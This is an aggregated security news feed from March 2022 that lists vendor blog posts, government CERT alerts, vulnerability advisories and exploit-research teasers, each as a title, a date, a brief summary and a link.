After more than a year of dedication and hard work, we are delighted to officially announce the launch of our new Edge Diagnostics application on March 30, 2022. Diagnosing network and content issues quickly and effectively is critical to your success! Therefore the aim is to make the existing diagnostic tools faster, easier to navigate, more user-friendly, and with improved functionality and a developer focus in mind.

https://www.akamai.com/blog/news/welcome-to-edge-diagnostics
Meet Anthony Hogg: Senior Enterprise Architect and Lifelong Learner
2022-03-30T13:00:00Z | 1648645200

At Akamai and across the tech industry at large, best practices and tools are constantly evolving. To keep up with these changes, a passion for learning is key, especially among those who support and enable others. One Senior Enterprise Architect on Akamai?s Advanced Solutions team, Anthony Hogg, truly embodies this value.

https://www.akamai.com/blog/developers/meet-anthony-hogg-enterprise-architect
Security Alert (A22-03-20): Multiple Vulnerabilities in Google Chrome
2022-03-30T04:00:00Z | 1648612800

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-03-21): Vulnerability in VMware Products
2022-03-30T04:00:00Z | 1648612800

VMware has published a security advisory to address a vulnerability in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
A Fast and Seamless Gaming Experience for Gameloft
2022-03-29T13:00:00Z | 1648558800

Gameloft is a leading gaming provider with more than 20 years of history. The company, created in 2000, has a passion for games and a desire to distribute them to even more players around the world. By bringing the wonders of games to mobile devices and, now, to all digital platforms, Gameloft has helped to create an entirely new market that has become the biggest one in gaming. We?re very excited that this company, which has revolutionized the gaming industry, has chosen to work with Akamai.

https://www.akamai.com/blog/security/gameloft
Renewing Your SD-WAN? Here’s What to Consider
2022-03-29T11:23:53Z | 1648553033

The SD-WAN contract renewal period is an ideal time to review whether SD-WAN fits into your future plans. While SD-WAN is a powerful and cost-effective replacement for MPLS, enterprises need to make sure it answers their evolving needs, like cloud infrastructure, mitigating cyber risks, and enabling remote access from anywhere. 4 Things to Consider Before... The post Renewing Your SD-WAN? Here’s What to Consider appeared first on Cato Networks.

https://www.catonetworks.com/blog/renewing-your-sd-wan-heres-what-to-consider/
Akamai Accelerator Program: Technological Solutions for India?s Water Crisis
2022-03-28T13:00:00Z | 1648472400

Akamai?s India Corporate Social Responsibility (CSR) Trust is helping to tackle this major challenge. In accordance with the country?s CSR mandates, the trust allocates 2% of the branch?s revenue to CSR programs. Its flagship initiative is the Akamai Accelerator Program, which supports innovators who use scalable and sustainable technologies to solve India?s water crisis. As the impacts of climate change accelerate, so must we.

https://www.akamai.com/blog/culture/water-crisis-tech-solutions
High Threat Security Alert (A22-03-18): Vulnerability in Google Chrome
2022-03-28T04:00:00Z | 1648440000

Google released a security update to address a vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A22-03-19): Vulnerability in Microsoft Edge (Chromium-based)
2022-03-28T04:00:00Z | 1648440000

Microsoft released a security update to address a vulnerability in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Finding bugs to trigger Unauthenticated Command Injection in a NETGEAR router (PSV-2022–0044)
2022-03-26T00:00:00Z | 1648252800

Preface Hi, I’m stypr (@stereotype32 ) from Flatt Security Inc. Last year, I wrote a blog post about technical explanations about 0days found in Japanese OSS products. I have found a lot of vulnerabilities in various products since then. Unfortunately, most bugs I found did not get it fixed right away, so I did not get any chances to share some exciting vulnerabilities I found until today. This article will explain how I found various vulnerabilities and chained some of the vulnerabilities into an unauthenticated command execution without any preconditions in a NETGEAR’s WAC124(AC2000) router.

https://flatt.tech/research/posts/finding-bugs-to-trigger-unauthenticated-command-injection-in-a-netgear-router-psv-2022-0044/
What?s New for Developers: March 2022
2022-03-25T13:00:00Z | 1648213200

We have some excellent highlights this month. We?re excited to announce new videos, useful articles, an event recap, and much more.

https://www.akamai.com/blog/developers/whats-new-for-developers-march-2022
Towards Practical Security Optimizations for Binaries
2022-03-25T12:58:54Z | 1648213134

To be thus is nothing, but to be safely thus. (Macbeth: 3.1) It’s not enough that compilers generate efficient code, they must also generate safe code. Despite the extensive testing and correctness certification that goes into developing compilers and their optimization passes, they may inadvertently introduce information leaks […]

https://blog.trailofbits.com/2022/03/25/towards-practical-security-optimizations-for-binaries/
MKM: ettevõtlus- ja infotehnoloogiaminister kutsus kokku erakorralise küberjulgeoleku nõukogu
2022-03-25T07:00:28Z | 1648191628

Ettevõtlus- ja Infotehnoloogiaminister Andres Sutt kutsus kokku erakorralise küberjulgeoleku nõukogu, et arutada Eesti küberkaitse tugevdamist Ukraina-Venemaa sõja kontekstis. Küberjulgeoleku nõukogu keskendus muutunud küberohupildile ja erinevate valitsemisalade tegevustele, mis aitavad tõsta riigi küberturvalisuse taset.

https://ria.ee/uudised/mkm-ettevotlus-ja-infotehnoloogiaminister-kutsus-kokku-erakorralise-kuberjulgeoleku-noukogu
RIA analüüsis Ukrainat tabanud küberrünnakuid
2022-03-25T07:00:00Z | 1648191600

Eesti küberturvalisust tagav riigi infosüsteemi amet (RIA) koostas avalike allikate toel ülevaate, mis koondab kokku senised Ukraina vastu suunatud küberrünnakud ning hindab nende mõju.

https://ria.ee/uudised/ria-analuusis-ukrainat-tabanud-kuberrunnakuid
Security Alert (A22-03-17): Vulnerability in SonicWall Products
2022-03-25T04:00:00Z | 1648180800

SonicWall has released a security advisory to address a buffer overflow vulnerability in SonicOS which is the operating system for SonicWall firewalls.

https://www.govcert.gov.hk/en/alerts_detail.php
Teams suspension from FIRST
2022-03-25T00:00:00Z | 1648166400

The Board of Directors strongly believes that FIRST should be an inclusive organization with broad global participation and collaboration to make the internet safe for everyone.

https://www.first.org/newsroom/releases/20220325
Teams suspension from FIRST
2022-03-25T00:00:00Z | 1648166400

The Board of Directors strongly believes that FIRST should be an inclusive organization with broad global participation and collaboration to make the internet safe for everyone.

https://www.first.org/newsroom/releases/20220325
Unauthenticated Stack-Based Buffer Overflow Vulnerability In SonicOS
2022-03-24T23:31:01Z | 1648164661

A Stack-based buffer overflow vulnerability in the SonicOS via HTTP request allows a remote unauthenticated attacker to cause Denial of Service (DoS) or potentially results in code execution in the firewall.SonicWall PSIRT is not aware of active exploitation in the wild. No reports of a PoC have been made public and malicious use of this vulnerability has not been reported to SonicWall.And SonicWall strongly urges organizations using impacted SonicWall firewalls listed below to follow the provided guidance.NOTE: This vulnerability ONLY impacts the "web management" interface, the SonicOS SSLVPN interface is not impacted. CVE: CVE-2022-22274 Last updated: March 24, 2022, 11:31 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0003
5 SD-WAN Gaps that are Answered by SASE
2022-03-24T14:07:54Z | 1648130874

When SD-WAN emerged a decade ago, it quickly became a viable and cost-effective solution to MPLS. Back then, it was the technology for digital transformation. But today, enterprises have more advanced network and security needs, and IT leaders are realizing that SD-WAN doesn’t address them. What’s the alternative? According to Gartner, it’s SASE (Secure Access... The post 5 SD-WAN Gaps that are Answered by SASE appeared first on Cato Networks.

https://www.catonetworks.com/blog/sd-wan-gaps-that-are-answered-by-sase/
Cloudy and rainy cyber weather in February
2022-03-24T13:21:53Z | 1648128113

The war in Ukraine has not had a major impact on the cyber environment in Finland, but the international tensions will inevitably also affect the digital world and preparedness in digital environments. At the same time, ordinary cyber phenomena, such as scams and phishing, are still common. Multiple critical vulnerabilities were also discovered in the PCT Axeda platform that is widely used in medical devices.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_02/2022
Cloudy and rainy cyber weather in February
2022-03-24T13:21:53Z | 1648128113

The war in Ukraine has not had a major impact on the cyber environment in Finland, but the international tensions will inevitably also affect the digital world and preparedness in digital environments. At the same time, ordinary cyber phenomena, such as scams and phishing, are still common. Multiple critical vulnerabilities were also discovered in the PCT Axeda platform that is widely used in medical devices.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_02/2022
What's Driving Multi-Factor Authentication Adoption?
2022-03-24T13:00:00Z | 1648126800

The need for businesses to deploy MFA for the protection of employee accounts has never been greater ? according to the latest Verizon Data Breach report, nearly 80% of data breaches involve the use of stolen or compromised employee credentials and brute force logins.

https://www.akamai.com/blog/security/mfa-adoption
NCSC supports White House call for increased cyber security precautions
2022-03-24T10:41:40Z | 1648118500

Call for increased cyber security vigilance among organisations in response to the unprovoked, illegal and unnecessary invasion of Ukraine.

https://www.ncsc.gov.uk/news/ncsc-supports-white-house-call-for-increased-precautions
Lançada campanha de sensibilização "O que a Internet diz de si"
2022-03-24T00:00:00Z | 1648080000

Numa sociedade cada vez mais tecnológica, a população dos adultos mais velhos recorre cada vez mais ao uso de dispositivos móveis, computadores e tablets com o desejo de encurtar a distância que existe com as camadas mais jovens (filhos, netos, etc.). Muitos modernizaram-se na utilização de tecnologia e passaram a fazer compras online, a contactar com familiares e amigos através de diferentes plataformas, a realizar teleconsultas ou a aderir a redes sociais, entre outras atividades.  A pandemia veio intensificar esta situação e há que reforçar os conhecimentos desde grupo populacional, ajudando-os, com o contributo da ciência psicológica, a combater esta falta de competências de forma dinâmica, tangível, prática, aproveitando a motivação e necessidade que os mesmos sentem. Hoje, dia 24 de março, lançamos esta campanha de sensibilização O QUE A INTERNET DIZ DE SI. O objetivo é que os adultos mais velhos se identifiquem com o que está espelhado por personalidades conhecidas, como Júlia Pinheiro e Júlio Isidro, e possam, de forma lúdica e leve, assimilar boas práticas no uso da Internet.  A campanha será disseminada em televisão e canais digitais em formato de vídeos e posters.Conheça a campanha aqui.E saiba mais aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135652/lancada-campanha-de-sensibilizacao-o-que-a-internet-diz-de-si
CVE-2021-3422
2022-03-24T00:00:00Z | 1648080000

The lack of validation of a key-value field in the Splunk-to-Splunk protocol results in a denial-of-service in Splunk Enterprise instances configured to index Universal Forwarder traffic.Read more: "Splunk Patches Indexer Vulnerability Discovered by Team82"

https://claroty.com/team82/disclosure-dashboard/cve-2021-3422
Sound Exchange libsox sphere.c start_read() heap-based buffer overflow vulnerability
2022-03-23T00:00:00Z | 1647993600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1434
The ROI of Doing Nothing: How and Why IT Teams Should Strategically Plan
2022-03-22T15:00:28Z | 1647961228

In today’s business climate, standing still is the kiss of death. Businesses that wish to remain competitive, increase profit margins and improve customer success need to adopt new technologies and discover new markets. To support these efforts, IT teams need to be prepared for digital change – by making a strategic leap towards a network... The post The ROI of Doing Nothing: How and Why IT Teams Should Strategically Plan appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-and-why-it-teams-should-strategically-plan/
OpenSSL Infinite loop when parsing certificates CVE-2022-0778
2022-03-22T09:31:32Z | 1647941492

A vulnerability CVE-2022-0778 was found in OpenSSL that allows to trigger an infinite loop by crafting a certificate that has invalid elliptic curve parameters. Since certificate parsing happens before verification of the certificate signature, any process that parses an externally supplied certificate leads to a DoS (Denial of service) attack.SonicWall is investigating its product line to determine which products and cloud services may be affected by this vulnerability. CVE: CVE-2022-0778 Last updated: Oct. 14, 2022, 9:31 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002
Security Alert (A22-03-16): Vulnerability in Drupal
2022-03-22T04:00:00Z | 1647921600

Drupal has released a security advisory to address a vulnerability in the Guzzle library.

https://www.govcert.gov.hk/en/alerts_detail.php
Webcheck.PT disponibiliza novas validações
2022-03-22T00:00:00Z | 1647907200

Foram recentemente adicionados à plataforma Webcheck.PT um conjunto de novas validações a protocolos e funcionalidades de segurança: DANE e Renegociação Segura.O protocolo DANE (DNS-based Authentication of Named Entities) adiciona uma camada adicional de proteção ao serviço de alojamento de páginas de internet ou de email, uma vez que permite especificar informação no sistema DNS sobre o certificado que deverá ser utilizado para acesso ao seu website/email. Este protocolo tem como requisito a implementação de DNSSEC.Por sua vez, a Renegociação Segura permite verificar se os servidores de internet ou de email suportam a renegociação segura no estabelecimento da ligação, através do protocolo TLS.O Webcheck.PT é uma plataforma online, desenvolvida pelo .PT e pelo Centro Nacional de Cibersegurança, que permite aos utilizadores verificar, em tempo real, o nível de conformidade de um domínio de internet e de correio eletrónico com os mais recentes standards para a comunicação segura entre sistemas como, por exemplo, HTTPS, DNSSEC ou SPF. Aceda a Webcheck.PT, verifique se o seu domínio está em conformidade com as boas práticas, e contribua para um ciberespaço mais seguro!

https://dyn.cncs.gov.pt/pt/detalhe/art/135648/webcheckpt-disponibiliza-novas-validacoes
Ransomware Chokepoints: Disrupt the Attack
2022-03-21T16:03:12Z | 1647878592

The post Ransomware Chokepoints: Disrupt the Attack appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-ransomware-chokepoints
Akamai and Linode: Giving Developers One Place to Build, Run, and Secure Apps
2022-03-21T08:05:00Z | 1647849900

I am incredibly excited to announce that today we have completed the acquisition of Linode. You may have seen our press release announcing the acquisition, or listened to our earnings call during which our executives discussed why this is the right strategic investment for Akamai. But I wanted to use this opportunity to highlight why, as a technologist, this is such an important step forward for both Akamai and Linode, and what you can expect to see from us in the future.

https://www.akamai.com/blog/news/akamai-and-linode
Luuakse pilootrakendus e-hääletamiseks nutiseadmes
2022-03-21T07:00:00Z | 1647846000

Riigi Infosüsteemi Amet (RIA) ja Cybernetica AS sõlmisid koostöölepingu, et töötada välja valimiste rakendus mobiilses seadmes.

https://ria.ee/uudised/luuakse-pilootrakendus-e-haaletamiseks-nutiseadmes
Adding Akamai Shared Domains to the Public Suffix List
2022-03-21T05:00:00Z | 1647838800

Akamai plans to submit a number of our shared domains to the ?PRIVATE? section of the Public Suffix List (PSL) at some point on or after March 31, 2022. The PSL contains multi-party domain suffixes and is used by a wide range of client software (for example, web browsers) to implement policy decisions, such as to prevent cookies from being set on public or multi-party domains.

https://www.akamai.com/blog/developers/adding-akamai-shared-domains-to-the-public-suffix-list
Careful preparation is the key to a successful cyber exercise
2022-03-18T07:15:30Z | 1647587730

In 2022, our Information Security Now! articles will focus on the steps taken before a cyber security exercise. The first article discusses organisational cyber maturity, meaning the ability of organisations to detect events and operate in their own cyber environments. The article presents some basic pillars of cyber maturity that help improve the overall information security in organisations.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/onnistunut-kyberharjoitus-alkaa-huolellisella-valmistautumisella
Careful preparation is the key to a successful cyber exercise
2022-03-18T07:15:30Z | 1647587730

In 2022, our Information Security Now! articles will focus on the steps taken before a cyber security exercise. The first article discusses organisational cyber maturity, meaning the ability of organisations to detect events and operate in their own cyber environments. The article presents some basic pillars of cyber maturity that help improve the overall information security in organisations.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/onnistunut-kyberharjoitus-alkaa-huolellisella-valmistautumisella
Be aware of fraudsters on online marketplaces!
2022-03-18T07:12:36Z | 1647587556

The number of attempted scams reported to the NCSC-FI has doubled since December 2021. Courier frauds have lately been common on various online marketplaces, such as Tori.fi and Facebook Marketplace. In these scams, criminals try to gain access to the seller’s banking and credit card details. Be alert and question the buyer’s wish to use a courier service.

https://www.kyberturvallisuuskeskus.fi/en/ttn_04032022
Be aware of fraudsters on online marketplaces!
2022-03-18T07:12:36Z | 1647587556

The number of attempted scams reported to the NCSC-FI has doubled since December 2021. Courier frauds have lately been common on various online marketplaces, such as Tori.fi and Facebook Marketplace. In these scams, criminals try to gain access to the seller’s banking and credit card details. Be alert and question the buyer’s wish to use a courier service.

https://www.kyberturvallisuuskeskus.fi/en/ttn_04032022
Cyber security preparedness before risks materialise – instructions for organisations
2022-03-18T07:09:45Z | 1647587385

The current cyber security situation in Finland is stable. Communications network performance is normal, and telecommunications operators have extensive experience of preparedness. Many organisations are nonetheless thinking about how the rising international tensions may affect their own cyber security. Building a solid foundation for cyber security is an investment in ensuring the continuity of operations every day.

https://www.kyberturvallisuuskeskus.fi/en/news/cyber-security-preparedness-risks-materialise-instructions-organisations
Cyber security preparedness before risks materialise – instructions for organisations
2022-03-18T07:09:45Z | 1647587385

The current cyber security situation in Finland is stable. Communications network performance is normal, and telecommunications operators have extensive experience of preparedness. Many organisations are nonetheless thinking about how the rising international tensions may affect their own cyber security. Building a solid foundation for cyber security is an investment in ensuring the continuity of operations every day.

https://www.kyberturvallisuuskeskus.fi/en/news/cyber-security-preparedness-risks-materialise-instructions-organisations
Security Alert (A22-03-14): Multiple Vulnerabilities in Microsoft Edge (Chromium-based)
2022-03-18T04:00:00Z | 1647576000

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-03-15): Vulnerability in OpenSSL
2022-03-18T04:00:00Z | 1647576000

OpenSSL has released 1.1.1n and 3.0.2 to fix the vulnerability in various versions of OpenSSL.

https://www.govcert.gov.hk/en/alerts_detail.php
The ?PhoneHome? DDoS Attack ? Everything You Need to Know
2022-03-17T13:00:00Z | 1647522000

A vulnerability in enterprise collaboration suite MiCollab by telecommunications company Mitel has been abused for distributed denial-of-service (DDoS) attacks with record-breaking amplification potential.

https://www.akamai.com/blog/security/phonehome-ddos-attack
Does WAN transformation make sense when MPLS is cheap?
2022-03-17T09:49:58Z | 1647510598

WAN transformation with SD-WAN and SASE is a strategic project for many organizations. One of the common drivers for this project is cost savings, specifically the reduction of MPLS connectivity costs. But, what happens when the cost of MPLS is low? This happens in many developing nations, where the cost of high-quality internet is similar... The post Does WAN transformation make sense when MPLS is cheap? appeared first on Cato Networks.

https://www.catonetworks.com/blog/does-wan-transformation-make-sense-when-mpls-is-cheap/
Security Alert (A22-03-12): Multiple Vulnerabilities in Drupal
2022-03-17T04:00:00Z | 1647489600

Drupal has released a security advisory to address multiple vulnerabilities in the CKEditor library for WYSIWYG editing.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-03-13): Multiple Vulnerabilities in ISC BIND
2022-03-17T04:00:00Z | 1647489600

ISC has released a security update to fix the vulnerabilities in BIND.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-03-11): Multiple Vulnerabilities in Google Chrome
2022-03-16T04:00:00Z | 1647403200

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Exploit Development: Browser Exploitation on Windows - CVE-2019-0567, A Microsoft Edge Type Confusion Vulnerability (Part 2)
2022-03-16T00:00:00Z | 1647388800

Leveraging ChakraCore to convert our denial-of-service from part 1 into a read/write primtive and functioning exploit.

/type-confusion-part-2/
Akamai Is a Leader in Forrester New Wave: Microsegmentation
2022-03-15T13:00:00Z | 1647349200

We are excited to be named a Leader in The Forrester New Wave?: Microsegmentation, Q1 2022. We were evaluated alongside eight other vendors in the microsegmentation space and ranked in 10 criteria, including product vision, interface and reporting, host agents, agentless aspect, product, and services support.

https://www.akamai.com/blog/security/akamai-microsegmentation
Windstream Enterprise partners with Cato Networks to Deliver Cloud-native SASE to organizations in North America
2022-03-15T12:50:37Z | 1647348637

We are proud and excited to announce our partnership with Windstream Enterprise (WE), a leading Managed Service Provider (MSP) delivering voice and communication services across North America. WE will offer Cato’s proven and mature SASE platform to enterprises of all sizes. Cato offers WE a unique business and technical competitive advantage. By leveraging Cato’s SASE... The post Windstream Enterprise partners with Cato Networks to Deliver Cloud-native SASE to organizations in North America appeared first on Cato Networks.

https://www.catonetworks.com/blog/windstream-partners-with-cato-networks-to-deliver-cloud-native-sase/
4 Considerations to Take Before Renewing Your SD-WAN Product or Contract
2022-03-15T09:23:06Z | 1647336186

The post 4 Considerations to Take Before Renewing Your SD-WAN Product or Contract appeared first on Cato Networks.

https://www.catonetworks.com/resources/4-considerations-to-take-before-renewing-your-sd-wan-product-or-contract/
ID-tarkvara värske versioon sai uuendusliku Web eID liidese
2022-03-15T07:00:00Z | 1647327600

Tänasest saab veebilehelt id.ee alla laadida ID-tarkvara värskenduse, milles asendati senise ID-kaardi veebis autentimise ja allkirjastamise lahendus Web eID lahendusega.

https://ria.ee/uudised/id-tarkvara-varske-versioon-sai-uuendusliku-web-eid-liidese
Security Alert (A22-03-09): Multiple Vulnerabilities in Apple iOS and iPadOS
2022-03-15T04:00:00Z | 1647316800

Apple has released iOS 15.4 and iPadOS 15.4 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-03-10): Multiple Vulnerabilities in Apache HTTP Server
2022-03-15T04:00:00Z | 1647316800

The Apache Software Foundation released a security update to address multiple vulnerabilities in the HTTP Server and its modules.

https://www.govcert.gov.hk/en/alerts_detail.php
Webroot Secure Anywhere IOCTL GetProcessCommand and B_03 out-of-bounds read vulnerability
2022-03-15T00:00:00Z | 1647302400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1433
Leadtools fltSaveCMP integer overflow vulnerability
2022-03-15T00:00:00Z | 1647302400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1464
Post-Auth OS Command Injection vulnerability Impacting End-Of-Life SRA Appliances and End-Of-Support SMA100 firmware versions
2022-03-12T02:48:32Z | 1647053312

NOTE: SonicWall PSIRT has observed threat actors targeting EOL SRA devices (CVE-2021-20028), and active exploitation of this vulnerability is likely.SonicWall is aware of a ‘Post Authentication OS Command Injection’ vulnerability, reported by Compass Security, impacting end-of-life Secure Remote Access (SRA) series products, specifically appliances running all 8.x or 9.0.0.5-19sv and earlier versions. And Secure Mobile Access (SMA) 100 series products running old firmware 9.0.0.9-26sv and earlier versions.In February 2021, SonicWall released SMA firmware 10.2.0.7 and 9.0.0.10 to fix a zero-day vulnerability, along with additional comprehensive code-strengthening. This strengthening proactively prevented this newly reported vulnerability in versions 9.0.0.10 and later.-   Organizations that previously upgraded to the 9.0.0.10 firmware or later are already protected against this newly reported issue and no action is required.-   Organizations with any 10.x versions are not impacted by this vulnerability as the vulnerable feature was deprecated in the 10.x release.-   Organizations running any firmware versions of 8.x or older than 9.0.0.10 or 10.2.0.7 should, per our earlier instructions, upgrade immediately. These older versions may potentially be exploited if not patched immediately.IMPORTANT: SMA 1000 series products are not affected by this vulnerability. CVE: CVE-2022-22273 Last updated: March 12, 2022, 2:48 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0001
Six Key Takeaways from the OMB Memo
2022-03-11T14:00:00Z | 1647007200

In May 2021, following a number of high-profile security incidents, U.S. President Biden issued an executive order that set out a high-level agenda to modernize and improve the government?s cyber resilience. This January, the U.S. Office of Management and Budget (OMB) issued a memo to the heads of executive departments and agencies that gave much more detail on how the U.S. government will move toward Zero Trust security principles.

https://www.akamai.com/blog/security/omb-memo
Exploit Development: Browser Exploitation on Windows - CVE-2019-0567, A Microsoft Edge Type Confusion Vulnerability (Part 1)
2022-03-11T00:00:00Z | 1646956800

End-to-end 'modern' browser exploitation on Windows beginning with configuring a browser exploitation environment, exploring JavaScript intrinsics, and understanding type confusion vulnerabilities.

/type-confusion-part-1/
DNS Cybersquatting: The Case for Edge DNS Zone Protect
2022-03-10T14:00:00Z | 1646920800

Cybersquatting, also known as domain squatting, is a type of scam that mimics a brand's domain to confuse potential victims and gain their trust. According to Revision Legal, ?Cybersquatting is prohibited in the U.S. by federal law under the Anticybersquatting Consumer Protection Act (ACPA.)? These fake domains can be used in cyberattacks ? especially phishing attacks.

https://www.akamai.com/blog/security/dns-cybersquatting
In China and Japan, Malicious Botnets Surge Amidst Holiday Ecommerce Traffic
2022-03-10T14:00:00Z | 1646920800

Akamai data shows that in the days leading up to and including Lunar New Year, the activity of malicious bots increased 15% in China over the previous month. While a similar surge occurs during the high-traffic seen at the end-of-year holidays in EMEA and the U.S. ? China and Japan present a particularly enticing opportunity for successful cyberattacks because of the sheer volume in traffic: Retailers and ecommerce here serve some of the largest populations in the world.

https://www.akamai.com/blog/security/china-and-japan-holiday-botnets
Eye-Opening Results from Forrester’s Cato SASE Total Economic Impact Report
2022-03-10T13:03:06Z | 1646917386

We’ve been touting the real-world benefits of Cato SASE on our Web site and in seminars, case studies, and solution briefs since the company was founded, but how do those benefits translate into hard numbers? We decided it was time to quantify Cato SASE’s real-world financial benefit with a recognized, well-structured methodology, so we commissioned... The post Eye-Opening Results from Forrester’s Cato SASE Total Economic Impact Report appeared first on Cato Networks.

https://www.catonetworks.com/blog/eye-opening-results-from-forresters-cato-sase-total-economic-impact-report/
Common Cyber Attacks: Reducing the Impact
2022-03-10T09:10:16Z | 1646903416

This white paper explains how basic security controls can protect organisations from the most common cyber attacks.

https://www.ncsc.gov.uk/guidance/white-papers/common-cyber-attacks-reducing-impact
Uut tüüpi libakirjad kasutavad ära sõda Ukrainas
2022-03-10T07:00:00Z | 1646895600

Riigi Infosüsteemi Amet (RIA) hoiatab libakirjade eest, mis kasutavad ära Venemaa sõda Ukraina vastu.

https://ria.ee/uudised/uut-tuupi-libakirjad-kasutavad-ara-soda-ukrainas
Greenwashing or Legit?
2022-03-09T14:00:00Z | 1646834400

I think we can all agree that sustainability is one of the most important topics that we will discuss this year. It's driving consumer habits, business practices, and investment decisions. And it?s a discussion that?s happening at every level of the business; from procurement all the way up to the boardroom.

https://www.akamai.com/blog/trends/greenwashing
The Akamai Foundation: Making a Global Impact
2022-03-09T14:00:00Z | 1646834400

In 2021, the impact of the Akamai Foundation?s philanthropic activities continued to expand beyond science, technology, engineering, and mathematics (STEM) education, deepening our commitment to digital equity and inclusion around the globe and to making a positive impact in the communities we serve.

https://www.akamai.com/blog/news/akamai-foundation-global-impact
Is SD-WAN Enough for Global Organizations?
2022-03-09T09:18:11Z | 1646817491

SD-WAN networks provide multiple benefits to organizations, especially when compared to MPLS. SD-WAN improves cloud application performance, reduces WAN costs and increases business agility. However, SD-WAN also has some downsides, which modern organizations should take into consideration when choosing SD-WAN or planning its implementation. This blog post lists the top considerations for enterprises that are... The post Is SD-WAN Enough for Global Organizations? appeared first on Cato Networks.

https://www.catonetworks.com/blog/is-sd-wan-enough-for-global-organizations/
High Threat Security Alert (A22-03-07): Multiple Vulnerabilities in Microsoft Products (March 2022)
2022-03-09T04:00:00Z | 1646798400

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-03-08): Multiple Vulnerabilities in Firefox
2022-03-09T04:00:00Z | 1646798400

Mozilla has published the advisories (MFSA2022-10 and MFSA2022-11) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2022-26143: TP240PhoneHome Reflection/Amplification DDoS Attack Vector
2022-03-08T14:00:00Z | 1646748000

A new reflection/amplification distributed denial of service (DDoS) vector with a record-breaking potential amplification ratio of 4,294,967,296:1 has been abused by attackers in the wild to launch multiple high-impact DDoS attacks.

https://www.akamai.com/blog/security/phone-home-ddos-attack-vector
How We?re Conserving Energy While Energizing Online Experiences
2022-03-08T14:00:00Z | 1646748000

I?ve always loved building things. At Akamai, I get to be part of a team that builds amazing things ? things that power and protect online experiences and make life better for billions of people, billions of times a day. But delivering those online experiences comes with a catch.

https://www.akamai.com/blog/news/conserving-energy
8 Reasons Enterprises are Adopting SASE Globally
2022-03-08T12:24:32Z | 1646742272

SASE (Secure Access Service Edge) is a new enterprise architecture technology that converges all network and security needs, by design. By replacing all point solutions, SASE provides a unified, global and cloud-based network that supports all edges. As a result, SASE solutions improve organizational performance, business agility and connectivity. They also reduce IT overhead. Ever... The post 8 Reasons Enterprises are Adopting SASE Globally appeared first on Cato Networks.

https://www.catonetworks.com/blog/8-reasons-enterprises-are-adopting-sase-globally/
Olukord küberruumis – veebruar 2022
2022-03-08T07:00:00Z | 1646722800

Veebruaris registreerisime 174 mõjuga intsidenti, mis on aasta keskmisest veidi madalam näitaja.

https://ria.ee/uudised/olukord-kuberruumis-veebruar-2022
High Threat Security Alert (A22-03-05): Vulnerability in Linux Operating Systems
2022-03-08T04:00:00Z | 1646712000

A local privilege escalation vulnerability is found in the Linux kernel 5.8 or later.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-03-06): Multiple Vulnerabilities in Android
2022-03-08T04:00:00Z | 1646712000

Google has released Android Security Bulletin March 2022 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2022-0835
2022-03-08T00:00:00Z | 1646697600

CWE-316 CLEARTEXT STORAGE OF SENSITIVE INFORMATION IN MEMORY: Successful exploitation of these vulnerabilities could allow an attacker to leverage the misconfigured privileges to the installed directory and achieve code execution in the application's context and permissions.

https://claroty.com/team82/disclosure-dashboard/cve-2022-0835
SS8 Networks Acquires Creativity Software
2022-03-07T14:00:59Z | 1646661659

Deal Enhances SS8’s Ability to Provide Precise Location Intelligence to Law Enforcement and Emergency Services MILPITAS, Calif. and SURREY, England – March 7, 2022 – SS8 Networks, a leader in Lawful Intercept and Monitoring Center Platforms, today announced the acquisition of Creativity Software, a leading provider of mobile network location intelligence. The transaction expands SS8’s capabilities to include […] The post SS8 Networks Acquires Creativity Software appeared first on SS8.

https://www.ss8.com/ss8-networks-acquires-creativity-software/
What Does Fishing for Rebar Have to Do with Building a More Sustainable Internet?
2022-03-07T14:00:00Z | 1646661600

Danny Lewin Community Care Days (DLCCDs) are a celebration of our late co-founder Danny Lewin?s generous spirit and his tenacious appetites for collaboration, innovation, and (especially) giving back to our global community. DLCCDs bring to life our values and empower all Akamai employees to volunteer in the communities where we work, operate, and live.

https://www.akamai.com/blog/culture/fishing-for-rebar
Actions Akamai Is Taking on Russia and Ukraine
2022-03-07T12:59:00Z | 1646657940

Akamai stands with the people of Ukraine. As the assault on Ukraine continues, we are inspired by the courageous citizens defending their sovereignty.

https://www.akamai.com/blog/news/ukraine-statement
High Threat Security Alert (A22-03-04): Multiple Vulnerabilities in Firefox
2022-03-07T04:00:00Z | 1646625600

Mozilla has published the advisory (MFSA2022-09) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-03-03): Multiple Vulnerabilities in Microsoft Edge (Chromium-based)
2022-03-04T04:00:00Z | 1646366400

